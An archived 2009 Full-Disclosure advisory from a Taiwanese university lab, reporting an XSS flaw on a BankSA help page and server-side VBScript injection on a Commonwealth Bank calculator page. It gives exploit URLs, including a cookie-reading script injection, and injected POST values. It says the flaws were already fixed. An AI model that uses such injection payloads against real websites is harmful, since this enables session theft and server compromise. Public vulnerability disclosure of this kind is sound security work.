|
|
[ Message Precedent sur la mailing][ Message Suivant sur la mailing][ Precedent dans le fil][ Prochain dans le fil][ Index par Date][ Index par fil]
[Full-disclosure] Security Advisory: Banks in Australia
============================================== Security Advisory: Banks in Australia militan (Chia-Jun Lin) militan.c7@xxxxxxxxxadl.csie.ncu.edu.tw/~militan
militan-c7.blogspot.comAdvanced Defense Lab(ADL), NCU CSIE TAIWAN 12th May, 2009 ============================================== I. VULNERABILITY
-------------------------
XSS Command Injection Banks below are vulnerable: BankSA. www.banksa.com.auCommonwealth Bank. www.commbank.com.au
etc...
II. DESCRIPTION ------------------------- Some banks contain vulnerabilities in certain pages, which may be misused by attackers. Via the command injection, attackers can execute any _vbscript_ command on the hosts.
Generally, the security mechanism of the websites of banks in AU are implemented indeed. However, their complex architectures are unnecessary actually. Due to the large architectures, some pages do not perform the validation properly.
III. Detail & POC ------------------------ 1. BankSA: XSS. _javascript_ Injection. webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS
The BBO function means "Business banking online", and the vulnerable variable is "origin". If origin=CBS, the page will immediately redirect to the link below. www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS
Nevertheless, if origin=CBS" then the page would redirect inappropriately. ****_javascript_ code generated in the intermediate page function focusWin() { window.focus(); //var theUrl = window.location.pathname;
//var pos = theUrl.indexOf("help.asp"); //theUrl = theUrl.substr(0,pos); window.location.href = "" href="http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS" target="_blank">http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS"";
//document.write(" http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS"");
} window.>**** Exploit: webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS";%0a%0aalert(document.cookie);//
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS";}</script>%0a%0a<script>alert("Vulnerable")</script>
POC: http://adl.csie.ncu.edu.tw/~militan/banksa1.jpghttp://adl.csie.ncu.edu.tw/~militan/banksa2.jpg
http://adl.csie.ncu.edu.tw/~militan/banksa3.jpg2. Commonwealth Bank: ASP command injection (server-side _vbscript_ injection) The commbank provides lots of tools to calculate, or to evaluate the financial plan.
This page would collect personal information and make an appointment. www.commbank.com.au/retirement/_PRODUCTION/content/ffthinkabout.asp
However, almost all the parameters are manipulated in _vbscript_ on server. Moreover, the page will return the error message when you mangle the parameters. Thus attackers can craft the exploit easily, and then arbitrary _vbscript_ commands can be executed on server.
Exploit: post parameter: Whattodo (default: FillForm) FillForm & Response.write("ccccc")' FillForm & Response.write("ccccc") %0d%0a Response.write("kerker") '
POC: http://adl.csie.ncu.edu.tw/~militan/commbank1.jpg
http://adl.csie.ncu.edu.tw/~militan/commbank2.jpg
http://adl.csie.ncu.edu.tw/~militan/commbank4.jpgIV. SOLUTION& CONCLUSION ------------------------- Most banks in AU should reduce the enormous architecture of their website :
do not provide additional functions or make sure that these functions are secure. The vulnerabilities have been fixed already. regards -- militan Advanced Defense Lab, NCU Taiwan
Full-Disclosure - We believe in it.
Charter: link://[click]
Hosted and sponsored by Secunia - link://[click]
Archives de la liste de diffusion Secunia
Archives de la liste de diffusion Full Disclosure
| Mini-Tagwall des articles publiés sur SecuObs : | | | | sécurité, exploit, windows, attaque, outil, microsoft, réseau, audit, metasploit, vulnérabilité, système, virus, internet, usbsploit, données, source, linux, protocol, présentation, scanne, réseaux, scanner, bluetooth, conférence, reverse, shell, meterpreter, vista, rootkit, détection, mobile, security, malicieux, engineering, téléphone, paquet, trames, https, noyau, utilisant, intel, wishmaster, google, sysun, libre |
| Mini-Tagwall de l'annuaire video : | | | | curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio |
| Mini-Tagwall des articles de la revue de presse : | | | | security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
| Mini-Tagwall des Tweets de la revue Twitter : | | | | security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
|
|
|
|
|
